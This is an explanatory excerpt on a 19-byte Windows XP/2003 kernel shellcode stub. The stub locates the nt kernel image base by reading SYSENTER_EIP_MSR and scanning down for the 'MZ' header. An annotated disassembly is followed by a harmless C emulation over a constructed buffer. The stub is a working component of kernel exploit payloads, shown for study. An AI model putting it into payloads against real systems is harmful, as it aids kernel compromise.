Size: 19 bytes
Compat: XP, 2003 (modern processors only)
For processors that support the system call MSR 0x176
(SYSENTER_EIP_MSR), the base address of nt can
be found by reading the address of the registered system call handler
from that MSR and then using the scandown technique from that address
to find the image base (the page containing the 'MZ' header). The
following disassembly illustrates how this can be accomplished:
00000000 6A76        push byte +0x76       ; ecx = 0x76
00000002 59          pop ecx
00000003 FEC5        inc ch                ; ecx = 0x176 (SYSENTER_EIP_MSR)
00000005 0F32        rdmsr                 ; edx:eax = MSR[0x176]; eax = system call handler (low 32 bits)
00000007 662501F0    and ax,0xf001         ; clear bits 1..11 of the low word, keep bit 0
0000000B 48          dec eax               ; alternates between page-1 and the previous page boundary
0000000C 6681384D5A  cmp word [eax],0x5a4d ; 'MZ' at this address?
00000011 75F4        jnz 0x7               ; no: back to the and/dec and keep scanning down
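The and/dec pair is the interesting part: because bit 0 survives the mask, each page boundary is reached in two iterations (first page-1, then the boundary itself). The following C emulation, added here and not taken from the paper, runs that exact arithmetic over a constructed, zero-filled buffer with an 'MZ' word placed at offset 0x1000; the names scandown_mz, demo_find and demo_iters and the wrap-around bound are choices made for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEMO_PAGES   4u        /* constructed "memory": 4 pages of 0x1000 bytes */
#define DEMO_MZ_PAGE 0x1000u   /* constructed 'MZ' header sits at this page boundary */

/* Emulates the and/dec scandown loop from the stub above: 'eax' indexes
 * mem instead of kernel memory.  Returns the offset where the word 0x5a4d
 * ("MZ") was found, or 0xFFFFFFFF if the scan wraps below offset 0 (a
 * bound added for this emulation; the real stub has none).  If iters is
 * non-NULL it receives the number of cmp iterations performed. */
uint32_t scandown_mz(const uint8_t *mem, uint32_t start, unsigned *iters)
{
    uint32_t eax = start;
    unsigned n = 0;
    for (;;) {
        eax &= 0xFFFFF001u;          /* and ax,0xf001 (only the low word is masked) */
        eax -= 1;                    /* dec eax */
        n++;
        if (eax >= start)            /* wrapped past zero: give up */
            break;
        uint16_t w;                  /* cmp word [eax],0x5a4d: unaligned LE read */
        memcpy(&w, mem + eax, sizeof w);
        if (w == 0x5A4Du)
            break;
    }
    if (iters) *iters = n;
    return (eax >= start) ? 0xFFFFFFFFu : eax;
}

/* Builds the constructed buffer and scans down from 'start'. */
uint32_t demo_find(uint32_t start, unsigned *iters)
{
    uint8_t *mem = calloc(DEMO_PAGES, 0x1000u);
    if (!mem) return 0xFFFFFFFFu;
    mem[DEMO_MZ_PAGE] = 'M';
    mem[DEMO_MZ_PAGE + 1] = 'Z';
    uint32_t found = scandown_mz(mem, start, iters);
    free(mem);
    return found;
}

/* Number of iterations the scan needs from 'start'. */
unsigned demo_iters(uint32_t start)
{
    unsigned n = 0;
    demo_find(start, &n);
    return n;
}

int main(void)
{
    unsigned n = 0;
    uint32_t base = demo_find(0x3ABCu, &n);
    printf("found MZ at 0x%X after %u iterations\n", base, n);
    return 0;
}
```

Starting from 0x3ABC the emulation visits 0x2FFF, 0x2000, 0x1FFF and then 0x1000, i.e. two checks per page; an odd start address costs one extra iteration, which is the price the stub pays for dropping a separate page-alignment instruction.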